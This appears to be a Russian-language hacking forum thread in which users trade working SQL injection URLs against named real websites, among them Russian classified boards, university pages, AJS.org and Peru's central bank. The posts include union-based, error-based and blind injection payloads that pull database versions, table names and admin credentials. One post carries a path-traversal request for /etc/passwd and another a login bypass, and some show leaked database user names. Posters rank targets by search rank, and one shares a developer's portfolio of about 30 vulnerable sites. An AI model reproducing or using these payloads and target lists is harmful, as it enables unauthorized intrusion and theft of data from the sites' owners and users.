это просто от скуки Code: http://www.znaki.chebnet.com/s10.php?id=-660+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7+--+ ну а это вроде игровой портал Яндекс тИЦ: 210 Яндекс.Rank: 4 Google PageRank: 3/10 Code: http://www.gamesector.org/review.php?id=-141+union+select+1,2,concat_ws(0x3a,nick,icq,email),4,5,6,7,8,9,10,11+from+gs_authors+--+
http://www.sw-rent.pl/index.php?id=00000103+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+version()),1,64),floor(rand(0)*2)))-- http://www2.kro.nl/boemerang/index.php?offset=876&logid=-175+UnIon+selECt+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14,15+--+ Тупейший вывод таблиц) http://www.linkdump.be/index.php?y=2006&m=2+and+1=0+union+select+version%28%29,2,3,4,5,6,7,8+--+
AVON http://avon4u.ru/news.php?id=-443+and+1=2+union+select+1,2,concat(@@version,0x20,user(),0x20,database(),0x20,@@version_compile_os),4,5,6,7,8,9,10,11+-- version : 5.0.89-log user : wtavon4u@localhost database : wtavon4u os : unknown-freebsd7.2
Привет всем! На днях нашёл уязвимый сайт. Смотрю, внизу стоит ссылка на разраюотчика, я естественно перешёл по ней и все сайты оказались... уязвимы! Их было около 30. Но, вот в чём была проблема, у всех одинаковые хеши, увы, рассшифровать их, никто не смог (на Ачате). Вот сам сайт разработчика webinstruments.ru . Снизу, скуля на нём ТИЦ10(R2) PR2 ТИЦ10(R2) ТТИЦ10(R2) PR2 ТИЦ10(R2) PR1 ТИЦ40YC(R3) PR4 ТИЦ60(R3) PR3 ТИЦ70YC(R3) PR5 ТИЦ20(R2) PR20 ТИЦ20(R2) PR2 ТИЦ20(R2) ТИЦ10(R2) PR1 ТИЦ10YC(R2) PR1 P.S Это ещё не все сайты. Смотрите остальные в портфолио разработчика Удачи!
Code: http://www.formex.ru/catalog.php?id=-1003+union+select+table_name,2+from+information_schema.tables+limit+1,1--
Code: [COLOR=White]http://www.elecboard.ru/ind.php?pn=2&id_categ=-49+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+[/COLOR] 5.0.87-percona-highperf-logetrovich1975_123etrovich1975@localhost тиц 10 PageRank 1 Code: [COLOR=White]http://www.bbsplus.ru/ind.php?pn=9&id_categ=-13+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--+[/COLOR] 5.1.39:yambi_bbsplus:yambi_bbsplus@localhost PageRank 2 Code: [COLOR=White]http://www.elecab.ru/board/ind.php?pn=15&id_categ=-41+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+[/COLOR] 4.1.25-log:elecab43_elecab:elecab43_userel@localhost тиц 20 PageRank 2
Code: http://www.ceit.es/index.php?option=com_personal&view=detalle&trbId=-105+UNION+SELECT+1,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,3,4,5,6,7%20from%20ivj_users%20limit%200,1--&catId=91&prsId=1&Itemid=25&lang=en Username: jmuser@localhost Version: 5.0.51a-24+lenny3 Database: ceit Google PR: 6
http://eclassifieds.massagetoday.com/eclassified/detail.php?&id=7842'+group+by+19+/*+ там 18 полей, немогу раскрутить) http://www.massagetoday.com/mpacms/mt/year.php?year=2009'+union+select+1,2+/*+ а тута нету доступа к information_schema.tables
Искал запчасти http://www.rulu.ru/catalogs/index.html?brid=538&mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1)))%3E1 2NorB: Боюсь тебя удивить, но в 4-ой ветке никогда не было information_schema.tables
\ Code: http://www.best-doska.ru/ind.php?pn=229&id_typ=-191+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,2,23,24+from+information_schema.tables+--+
SQL Injection http://kappaepsilon.org/index.php?inc=news&opt=details&id=-44+union+select+1,concat(username,char(58),password),3+from+admins качалка файлов http://kappaepsilon.org/open_files/file.php?file=../../../../../../../../../../../etc/passwd&name=antichat PR-5
http://www.opened.ru/scenary/index.php?id=-207+union+select+1,2,3,4,5,6,7,8,group_concat(concat(table_name,0x3a,table_rows)separator+0x3c62723e),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,4+from+information_schema.tables--+
Code: [COLOR=White]http://www.mckn.ru/gocka/ind.php?pn=4&id_categ=-2+union+select+1,2,3,4,5,UNHEX(HEX(concat_ws(0x3a,version(),database(),user()))),7,8,9,10,11,12,13,14,15--+[/COLOR] 4.1.11-Debian_4sarge5-log:z59769_mckn:[email protected] тиц 230 PageRank 2 Code: [COLOR=White]http://www.aslalab.ru/cat/ind.php?pn=4&id_typ=-10+union+select+1,2,3,4,5,6,(concat_ws(0x3a,version(),database(),user())),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+[/COLOR] 5.1.43-log:wwwaslalabru_msql3:[email protected] PageRank 4
http://www.swiftnets.com/store/category.asp?CatID=2+and+1=@@version в поле логина http://www.swiftnets.com/resellerlogin.asp ' or 1=1-- -------------- AJS.org http://www.ajs.org/cart/thumbnail.asp?subject_id=2+union+select+1+from+users PR-7
Bank of Peru [Banco Central de Reserva del Peru] Code: http://estadisticas.bcrp.gob.pe/index.asp?sFrecuencia='+or+1=(select top 1 table_name from information_schema.tables)--+
учебные заведения Code: http://ecirgroup.com/edu.php?id=-2+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8+--+ Code: http://www.mmsshyj.com/wenming/edu.php?id=38&type=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9+--+ Code: http://me.eng.kmitl.ac.th/news-edu.php?id=-28+union+select+1,concat_ws(0x3a,version(),database(),user()),3+--+ Code: http://cs.montclair.edu/php/profile.php?id=-111+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),database(),user()),13,14,15,16+--+
http://www.infoflot.ru//newslenta/pheed.php?newsid=2866+and+1=0+union+select+1,table_name,3+from+information_schema.tables+--+ тИЦ:550
http://www.bazar-auto.ru/view.php?s=list&type=cars&sost=2&cityid=&b_id=&m_id=&car%5Bcost1%5D=&car%5Bcost2%5D=3000'))+and+(select+email+from+tbl_admin_users+where+id=2)=NULL+--+&qcurrency=USD&car%5Byear1%5D=&car%5Byear2%5D=&x=32&y=11 слепая скуль
https://www28.safesecureweb.com/thunderwear/shop_detail.asp?Product_ID=64+union+select+1,2,3,4,5,6,7,8,9+from+msysaccessobjects
